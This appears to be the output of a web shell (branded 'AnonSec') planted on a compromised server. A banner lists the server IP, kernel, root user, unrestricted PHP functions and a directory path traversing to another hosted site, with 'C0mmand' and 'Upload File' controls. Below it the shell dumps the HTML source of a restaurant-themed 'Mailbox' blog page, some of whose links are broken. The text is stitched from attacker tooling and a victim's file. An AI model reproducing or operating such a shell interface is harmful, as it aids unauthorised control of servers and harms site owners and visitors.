|
Server IP : 149.13.87.7 / Your IP : 185.174.145.2 Web Server : nginx System : Linux h2 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : root ( 0) PHP Version : 8.0.28 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /mnt/platforms/workspaces/kruppvalez.com/../mailbox.creativeworksvictoria.com/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Blog - Mailbox</title>
<script src="https://cdn.tailwindcss.com"></script>
<link href="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.css" rel="stylesheet" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800;900&family=Plus+Jakarta+Sans:wght@300;400;500;600;700;800;900&display=swap" rel="stylesheet">
<style>
html {
scroll-behavior: smooth;
}
body {
font-family: 'Inter', sans-serif;
padding-top: 80px;
}
h1, h2, h3, h4, h5, h6 {
font-family: 'Plus Jakarta Sans', sans-serif;
}
@media (max-width: 768px) {
body {
padding-top: 72px;
}
}
</style>
<meta name="theme-variant" content="351c4ca7ec00148d8897f2f7963124e7">
<link rel="stylesheet" href="assets/css/dynamic.css">
</head>
<body class="antialiased">
<nav class="fixed w-full z-50 top-0 bg-gradient-to-r from-gray-900 to-gray-800 text-white shadow-xl">
<div class="max-w-screen-xl flex flex-wrap items-center justify-between mx-auto px-6 py-2">
<a href="./" class="flex items-center space-x-3">
<div class="w-10 h-10 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-lg flex items-center justify-center">
<span class="text-white font-bold">M</span>
</div>
<span class="self-center text-xl font-bold">
Mailbox </span>
</a>
<button data-collapse-toggle="navbar-default" type="button" class="inline-flex items-center p-2 w-10 h-10 justify-center text-sm text-white rounded-lg md:hidden hover:bg-white/10">
<svg class="w-5 h-5" fill="none" viewBox="0 0 17 14">
<path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M1 1h15M1 7h15M1 13h15"/>
</svg>
</button>
<div class="hidden w-full md:block md:w-auto" id="navbar-default">
<ul class="font-medium flex flex-col md:flex-row md:space-x-6 items-center">
<li><a href="/Home</a></li>
<li><a href="about-us.php" class="block py-2 px-3 text-white/80 hover:text-white transition-colors">About</a></li>
<li><a href="blog/" class="block py-2 px-3 text-white/80 hover:text-white transition-colors">Blog</a></li>
<li>
<a href="contact.php" class="block py-2.5 px-6 bg-white text-gray-900 rounded-lg hover:bg-gray-100 transition-all font-semibold">Contact</a>
</li>
</ul>
</div>
</div>
</nav>
<section class="bg-white py-16 min-h-screen">
<div class="max-w-screen-xl mx-auto px-4">
<div class="grid lg:grid-cols-3 gap-12">
<div class="lg:col-span-2">
<div class="mb-8">
<h1 class="text-4xl md:text-5xl font-black text-gray-900 mb-4">Blog</h1>
<p class="text-xl text-gray-600">Latest articles and insights</p>
</div>
<div class="space-y-8">
<article class="group bg-white rounded-2xl overflow-hidden shadow-lg hover:shadow-2xl transition-all border border-gray-100">
<div class="relative h-80 overflow-hidden">
<img src="https://images.pexels.com/photos/5779787/pexels-photo-5779787.jpeg?auto=compress&cs=tinysrgb&h=650&w=940" alt="Mastering Restaurant Management: Strategies for Success and Growth" class="w-full h-full object-cover group-hover:scale-110 transition-transform duration-700">
<div class="absolute inset-0 bg-gradient-to-t from-black/70 via-black/20 to-transparent"></div>
<div class="absolute bottom-0 left-0 right-0 p-8">
<span class="inline-block px-4 py-2 bg-indigo-600 text-white text-sm font-bold rounded-full mb-4">General</span>
<h2 class="text-3xl font-black text-white mb-2 group-hover:text-purple-300 transition-colors">
<a href="/blog/mastering-restaurant-management-strategies-for-success-and-growth/">Mastering Restaurant Management: Strategies for Success and Growth</a>
</h2>
<div class="flex items-center text-white/90 text-sm">
<span>November 22, 2025</span>
<span class="mx-2">•</span>
<span>Dr. Maya Singh</span>
</div>
</div>
</div>
<div class="p-8">
<p class="text-gray-600 mb-6 leading-relaxed text-lg">In the competitive world of restaurant management, staying ahead requires a blend of strategic planning, operational efficiency, and exceptional customer...</p>
<a href="/blog/mastering-restaurant-management-strategies-for-success-and-growth/" class="inline-flex items-center px-6 py-3 bg-gradient-to-r from-indigo-600 to-violet-600 text-white font-semibold rounded-lg hover:shadow-lg transition-all">
Read Full Article
<i class="fas fa-arrow-right ml-2"></i>
</a>
</div>
</article>
<article class="group bg-white rounded-2xl overflow-hidden shadow-lg hover:shadow-2xl transition-all border border-gray-100">
<div class="relative h-80 overflow-hidden">
<img src="https://images.pexels.com/photos/3298634/pexels-photo-3298634.jpeg?auto=compress&cs=tinysrgb&h=650&w=940" alt="Chef Collective Innovation Hubs" class="w-full h-full object-cover group-hover:scale-110 transition-transform duration-700">
<div class="absolute inset-0 bg-gradient-to-t from-black/70 via-black/20 to-transparent"></div>
<div class="absolute bottom-0 left-0 right-0 p-8">
<span class="inline-block px-4 py-2 bg-indigo-600 text-white text-sm font-bold rounded-full mb-4">Innovation</span>
<h2 class="text-3xl font-black text-white mb-2 group-hover:text-purple-300 transition-colors">
<a href="/blog/chef-collective-innovation-hubs/">Chef Collective Innovation Hubs</a>
</h2>
<div class="flex items-center text-white/90 text-sm">
<span>November 19, 2025</span>
<span class="mx-2">•</span>
<span>Sarah Johnson</span>
</div>
</div>
</div>
<div class="p-8">
<p class="text-gray-600 mb-6 leading-relaxed text-lg">Chef collective innovation hubs let multi-brand restaurant groups prototype menus, tech, and training in 2025.</p>
<a href="/blog/chef-collective-innovation-hubs/" class="inline-flex items-center px-6 py-3 bg-gradient-to-r from-indigo-600 to-violet-600 text-white font-semibold rounded-lg hover:shadow-lg transition-all">
Read Full Article
<i class="fas fa-arrow-right ml-2"></i>
</a>
</div>
</article>
<article class="group bg-white rounded-2xl overflow-hidden shadow-lg hover:shadow-2xl transition-all border border-gray-100">
<div class="relative h-80 overflow-hidden">
<img src="https://images.pexels.com/photos/262047/pexels-photo-262047.jpeg?auto=compress&cs=tinysrgb&h=650&w=940" alt="Community Subscription Tables" class="w-full h-full object-cover group-hover:scale-110 transition-transform duration-700">
<div class="absolute inset-0 bg-gradient-to-t from-black/70 via-black/20 to-transparent"></div>
<div class="absolute bottom-0 left-0 right-0 p-8">
<span class="inline-block px-4 py-2 bg-indigo-600 text-white text-sm font-bold rounded-full mb-4">Loyalty</span>
<h2 class="text-3xl font-black text-white mb-2 group-hover:text-purple-300 transition-colors">
<a href="/blog/community-subscription-tables/">Community Subscription Tables</a>
</h2>
<div class="flex items-center text-white/90 text-sm">
<span>November 19, 2025</span>
<span class="mx-2">•</span>
<span>David Wilson</span>
</div>
</div>
</div>
<div class="p-8">
<p class="text-gray-600 mb-6 leading-relaxed text-lg">Community subscription tables bundle rotating dining experiences, giving neighborhoods guaranteed seats and perks in 2025.</p>
<a href="/blog/community-subscription-tables/" class="inline-flex items-center px-6 py-3 bg-gradient-to-r from-indigo-600 to-violet-600 text-white font-semibold rounded-lg hover:shadow-lg transition-all">
Read Full Article
<i class="fas fa-arrow-right ml-2"></i>
</a>
</div>
</article>
</div>
</div>
<aside class="lg:col-span-1">
<div class="sticky top-8 space-y-8">
<div class="bg-gradient-to-br from-indigo-50 to-violet-50 rounded-2xl p-6">
<h3 class="text-xl font-bold text-gray-900 mb-4">Stay Updated</h3>
<p class="text-gray-600 mb-4">Get the latest articles delivered to your inbox.</p>
<form class="space-y-3">
<input type="email" placeholder="Your email" class="w-full px-4 py-3 rounded-lg border border-gray-300 focus:ring-2 focus:ring-indigo-600 focus:border-transparent">
<button type="submit" class="w-full px-4 py-3 bg-indigo-600 text-white font-semibold rounded-lg hover:bg-indigo-700 transition-colors">
Subscribe
</button>
</form>
</div>
<div class="bg-white rounded-2xl p-6 shadow-lg border border-gray-100">
<h3 class="text-xl font-bold text-gray-900 mb-4">Categories</h3>
<ul class="space-y-2">
<li>
<a href="#" class="text-gray-600 hover:text-indigo-600 transition-colors flex items-center justify-between">
<span>General</span>
<i class="fas fa-chevron-right text-xs"></i>
</a>
</li>
<li>
<a href="#" class="text-gray-600 hover:text-indigo-600 transition-colors flex items-center justify-between">
<span>Innovation</span>
<i class="fas fa-chevron-right text-xs"></i>
</a>
</li>
<li>
<a href="#" class="text-gray-600 hover:text-indigo-600 transition-colors flex items-center justify-between">
<span>Loyalty</span>
<i class="fas fa-chevron-right text-xs"></i>
</a>
</li>
</ul>
</div>
</div>
</aside>
</div>
</div>
</section>
<footer class="bg-white border-t-2 border-gray-100 py-16">
<div class="max-w-screen-xl mx-auto px-4">
<div class="grid md:grid-cols-4 gap-12 mb-12">
<div class="md:col-span-2">
<a href="./" class="flex items-center space-x-3 mb-6">
<div class="w-12 h-12 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-xl flex items-center justify-center">
<span class="text-white font-bold text-xl">M</span>
</div>
<span class="text-2xl font-black text-gray-900">Mailbox</span>
</a>
<p class="text-gray-600 mb-6 max-w-md">Delivering excellence and innovation to help you achieve your goals.</p>
<div class="flex space-x-3">
<a href="#" class="w-10 h-10 bg-gray-100 hover:bg-indigo-600 hover:text-white rounded-lg flex items-center justify-center transition-all text-gray-600">
<i class="fab fa-facebook-f"></i>
</a>
<a href="#" class="w-10 h-10 bg-gray-100 hover:bg-indigo-600 hover:text-white rounded-lg flex items-center justify-center transition-all text-gray-600">
<i class="fab fa-twitter"></i>
</a>
<a href="#" class="w-10 h-10 bg-gray-100 hover:bg-indigo-600 hover:text-white rounded-lg flex items-center justify-center transition-all text-gray-600">
<i class="fab fa-linkedin-in"></i>
</a>
<a href="#" class="w-10 h-10 bg-gray-100 hover:bg-indigo-600 hover:text-white rounded-lg flex items-center justify-center transition-all text-gray-600">
<i class="fab fa-instagram"></i>
</a>
</div>
</div>
<div>
<h3 class="text-lg font-bold mb-6 text-gray-900">Company</h3>
<ul class="space-y-3 text-gray-600">
<li><a href="./" class="hover:text-indigoHome</a></li>
<li><a href="about-us.php" class="hover:text-indigo-600 transition-colors">About</a></li>
<li><a href="blog/" class="hover:text-indigoBlog</a></li>
<li><a href="contact.php" class="hover:text-indigo-600 transition-colors">Contact</a></li>
</ul>
</div>
<div>
<h3 class="text-lg font-bold mb-6 text-gray-900">Legal</h3>
<ul class="space-y-3 text-gray-600">
<li><a href="privacy.php" class="hover:text-indigo-600 transition-colors">Privacy</a></li>
<li><a href="terms.php" class="hover:text-indigo-600 transition-colors">Terms</a></li>
<li><a href="disclaimer.php" class="hover:text-indigo-600 transition-colors">Disclaimer</a></li>
</ul>
</div>
</div>
<div class="border-t border-gray-200 pt-8">
<p class="text-gray-500 text-sm text-center">© 2026 Mailbox. All rights reserved.</p>
</div>
</div>
</footer>
<script src="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.js"></script>
<script>
document.addEventListener('DOMContentLoaded', function() {
const paginationLinks = document.querySelectorAll('a[href*="?page="]');
paginationLinks.forEach(link => {
link.addEventListener('click', function(e) {
window.scrollTo({
top: 0,
behavior: 'smooth'
});
});
});
});
window.addEventListener('load', function() {
if (window.location.search.includes('page=')) {
setTimeout(function() {
window.scrollTo({
top: 0,
behavior: 'smooth'
});
}, 100);
}
});
</script>
</body>
</html>
AnonSec - 2021